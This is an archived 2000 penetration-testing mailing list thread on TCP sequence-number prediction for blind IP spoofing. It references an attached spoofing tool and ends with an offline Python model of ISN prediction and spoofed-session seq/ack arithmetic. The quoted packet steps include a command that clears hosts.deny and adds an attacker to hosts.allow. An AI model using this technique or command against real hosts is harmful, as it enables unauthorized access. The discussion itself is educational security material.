Penetration Testing mailing list archives
Re: [PEN-TEST] Exploiting sequence number predictability
From: Jean-Simon Durand <bugtraq () SUPERNET CA>
Date: Mon, 21 Aug 2000 23:53:09 -0400
sirc3 does something very close to that. It is a very old technique (2-3 years old at least) and it is rarely used today (I think) because the sequence numbers on most of the Unix systems are unpredictable. Most Windows systems are still vulnerable.

sirc was made with IRC in mind but if I remember correctly, it works with the telnet daemon. It tries to guess the sequence numbers to establish a TCP connection with any source IP address.

I attached (uuencoded) a copy of the source code for sirc3. I played with it a very long time ago so I'm not even sure if it needs modification to compile. If I remember correctly, it's for Linux but it can certainly be ported to other OSes.

Have fun!

Jean-Simon Durand
Montreal, Quebec, Canada

----- Original Message -----
From: "Dawes, Rogan" <rdawes () DELOITTE CO ZA>
To: <PEN-TEST () SECURITYFOCUS COM>
Sent: Friday, August 18, 2000 8:37 AM
Subject: [PEN-TEST] Exploiting sequence number predictability

[snip]
I imagine it is a case of:

1. determine the predictability algorithm (64k rule, or whatever)
2. Craft the packets required to execute the commands desired with the IP address of a permitted workstation.
   (packet 1 : SYN
    packet 2 : ACK xxxxx/username^M
    packet 3 : ACK xxxxy/password^M
    packet 4 : ACK xxxxz/echo > /etc/hosts.deny; echo attacker >> /etc/hosts.allow; exit^M, or whatever)
   where xxxxx-xxxxz are determined by the ISN, the number of bytes in the banner and login prompt, password prompt, and welcome banner/motd
Attachment: sirc3.tar.gz.uu
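The two steps sketched in the quoted message (check whether the target's ISNs follow a rule, then compute the seq/ack values for a blind, spoofed-source session) as an added, offline example. This is not sirc3 and not code from either poster: the two ISN generators are constructed stand-ins (one mimicking the old 64000-per-connection counter, one random), the prompt and command strings are made up, and the classifier is a crude predictability index in the spirit of the one port scanners report, not a real stack fingerprint. It does not send packets; it only models the arithmetic.

```python
"""Added example, not from the original thread: model the ISN prediction and
the blind-session sequence/ack arithmetic described above.
Assumptions: ISN generators below are constructed stand-ins for a target host,
prompt lengths and commands are invented."""
import random

WRAP = 1 << 32  # TCP sequence numbers are 32-bit, all arithmetic is mod 2**32


class Old64kISN:
    """Constructed stand-in for the classic BSD-style counter: +64000 per
    connection, +128000 per second (the '64k rule')."""
    def __init__(self, start=0x12345678):
        self.cur = start

    def next_isn(self, elapsed_sec=0.0):
        self.cur = (self.cur + 64000 + int(128000 * elapsed_sec)) % WRAP
        return self.cur


class RandomISN:
    """Constructed stand-in for a stack with unpredictable ISNs."""
    def __init__(self, seed=1):
        self.rng = random.Random(seed)

    def next_isn(self, elapsed_sec=0.0):
        return self.rng.getrandbits(32)


def isn_deltas(samples):
    """Differences between consecutive ISNs observed on back-to-back connects."""
    return [(b - a) % WRAP for a, b in zip(samples, samples[1:])]


def classify_isn(samples):
    """Step 1: decide whether a prediction rule exists.
    'constant' = every delta identical, 'low' = deltas spread under 2**16
    (guessable with a small window of attempts), 'high' = treat as random."""
    d = isn_deltas(samples)
    if len(set(d)) == 1:
        return "constant"
    return "low" if max(d) - min(d) < (1 << 16) else "high"


def predict_next_isn(samples):
    """Extrapolate the target's next ISN from the last observed delta.
    Only meaningful when classify_isn() is 'constant' or 'low'."""
    d = isn_deltas(samples)
    return (samples[-1] + d[-1]) % WRAP


def spoofed_session(target_isn, our_isn, server_output, client_lines):
    """Step 2: seq/ack for each packet sent blind from the spoofed address.
    server_output[i] is what the server emits before our i-th line (banner and
    login prompt, password prompt, motd and shell prompt); we never see it, so
    its byte count is what fixes the ACK value, exactly as the message says.
    Returns [(flag, seq, ack, payload), ...] for the SYN and each data ACK."""
    seq, ack = our_isn, target_isn
    pkts = [("SYN", seq, 0, b"")]
    seq = (seq + 1) % WRAP   # our SYN consumes one sequence number
    ack = (ack + 1) % WRAP   # the target's SYN does too: first ACK = ISN+1
    for out, line in zip(server_output, client_lines):
        ack = (ack + len(out)) % WRAP        # acknowledge the unseen prompt
        pkts.append(("ACK", seq, ack, line))
        seq = (seq + len(line)) % WRAP       # our payload advances our seq
    return pkts


if __name__ == "__main__":
    old = Old64kISN()
    seen = [old.next_isn() for _ in range(6)]       # six probe connections
    print("old stack:", classify_isn(seen), hex(predict_next_isn(seen)))
    rnd = RandomISN()
    print("random stack:", classify_isn([rnd.next_isn() for _ in range(6)]))
    # Constructed telnet-style exchange; CR-terminated lines as in the post.
    prompts = [b"login: ", b"Password: ", b"$ "]
    lines = [b"user\r", b"pass\r", b"id\r"]
    for p in spoofed_session(predict_next_isn(seen), 5000, prompts, lines):
        print(p)
```

The same classifier run against a modern stack's ISNs returns "high", which is the check to do before spending any time on the rest: with random ISNs the ACK field of the spoofed packets cannot be filled in and the session never opens.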